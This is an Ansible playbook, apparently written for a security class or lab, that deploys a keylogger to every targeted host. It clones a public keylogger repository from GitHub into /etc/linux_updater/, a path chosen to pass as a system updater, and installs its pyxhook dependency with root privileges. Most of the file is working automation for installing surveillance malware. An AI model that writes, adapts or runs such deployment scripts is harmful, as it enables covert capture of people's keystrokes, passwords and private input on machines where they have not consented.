#Garrett Thompson
#install keylogger
#9/24/24
#installs keylogger onto the machine ready to be ran whenever. doesn't start it since the way the keylogger is written it cannot run from a script must be manually started
---
- name: install keylogger
  hosts: all
  become: yes
  tasks:
    - name: update system
      apt:
        update_cache: yes
        upgrade: dist

          #- name: Ensure pip is installed
          #ansible.builtin.package:
          #name: python3-pip
          #state: present
    
          # - name: Install dependency using pip
          # ansible.builtin.pip:
          #name: pyxhook
          #state: present

    - name: Install Git and dependencies
      apt:
        name: 
        - git
        - build-essential
        - autoconf
        - automake
        state: present
    - name: Download keylogger from github
      git:
        repo: https://github.com/GiacomoLaw/Keylogger.git
        dest: /etc/linux_updater/
        update: yes

    - name: Install pyxhook in virtual environment
      command: sudo pip install pyxhook --break-system-packages